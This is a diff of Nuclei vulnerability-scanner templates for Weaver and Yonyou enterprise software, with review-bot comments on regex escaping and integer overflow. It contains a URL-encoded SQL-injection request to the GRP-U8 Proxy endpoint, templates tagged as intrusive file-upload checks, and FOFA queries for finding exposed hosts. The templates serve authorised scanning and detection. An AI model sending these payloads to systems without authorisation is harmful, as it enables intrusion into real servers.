Content-Disposition: form-data;name="FormData"
@ -50,9 +48,7 @@ http:
- type: word
part: body_2
words:
- "PHP Version"
- "PHP Extension"
condition: and
- "758058d8987e7a9ec723bcdbec6c407e"
- type: status
status:


@ -24,8 +24,8 @@ http:
- type: word
part: body
words:
- "datapassword"
- "datauser"
- "datapassword ="
- "datauser ="
condition: and
- type: status


@ -44,7 +44,7 @@ http:
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200"
- "contains(body_2, 'imageSrc') && contains(body_2, 'height')"
- "status_code_3 == 200 && contains(body_3,'{{randstr}}')"


@ -11,7 +11,7 @@ info:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/weaver-oa-workrelate-file-upload.yaml
metadata:
fofa-query: app="泛微-协同办公OA"
tags: ecology,upload,fileupload,intrusive
tags: ecology,fileupload,intrusive
variables:
filename: "{{to_lower(rand_base(5))}}"
@ -65,12 +65,12 @@ http:
internal: true
group: 1
regex:
- "&fileid=(.*?)\'>"
- "&fileid=(.*?)\\'>"
matchers-condition: and
matchers:
- type: dsl
dsl:
dsl:
- "status_code_1 == 200 && contains(body_1,'workrelate/plan/util/ViewDoc')"
- "status_code_2 == 200 && contains(body_2, 'println')"
- "status_code_3 == 200 && contains(body_3,'{{string}}')"
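Review bot: The corrected extractor on L665, `"&fileid=(.*?)\\'>"`, now yields the regex `\'`, a redundant escape — a single quote is not a metacharacter — so `- "&fileid=(.*?)'>"` expresses the same pattern without the double backslash. The tag change on L657 is fine. The `http` block continues past the hunk.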


@ -9,7 +9,7 @@ info:
reference: |
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
max-request: 2
max-request: 2
fofa-query: body="远程通CHANJET_Remote"
verified: true
tags: yonyou,chanjet,sqli


@ -12,7 +12,7 @@ info:
max-request: 1
fofa-query: app="用友-UFIDA-NC"
verified: true
tags: yonyou,fileupload,intrusive
tags: yonyou,file-upload,intrusive
variables:
file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"


@ -9,6 +9,11 @@ info:
- http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
tags: yonyou,grp,xxe,sqli
variables:
num1: "{{rand_int(800000, 999999)}}"
num2: "{{rand_int(800000, 999999)}}"
result: "{{to_number(num1)*to_number(num2)}}"
http:
- raw:
- |
@ -17,13 +22,14 @@ http:
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%20{{num1}}%2a{{num2}}%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1759837260"
- "{{result}}"
- type: word
words:
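Review bot: The new range `rand_int(800000, 999999)` on L704–L705 produces products between roughly 6.4e11 and 1e12, which exceed a signed 32-bit integer, whereas the literal it replaces (`42540*41369` on L713) stayed below 2^31. If the backend evaluates `select num1*num2` in a 32-bit integer type — SQL Server does for int literals — the expression raises an arithmetic-overflow error and the `{{result}}` word on L721 never appears, turning a true positive into a false negative. Reuse the bound the validate.jsp template in this commit already uses, `rand_int(40000, 44800)` (L435–L436), whose product cannot exceed 2,007,040,000. The `http` block continues past the hunk.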


@ -10,9 +10,9 @@ info:
- https://www.seebug.org/vuldb/ssvid-99547
- https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py
metadata:
max-request: 2
max-request: 2
fofa-query: app="用友-UFIDA-NC
verified: true
verified: true
tags: yonyou,intrusive,ufida,fileupload
variables:


@ -10,7 +10,7 @@ info:
max-request: 2
fofa-query: body="用友U8CRM"
verified: true
tags: yonyou,fileupload,u8-crm
tags: yonyou,file-upload,u8-crm,intrusive
http:
- raw: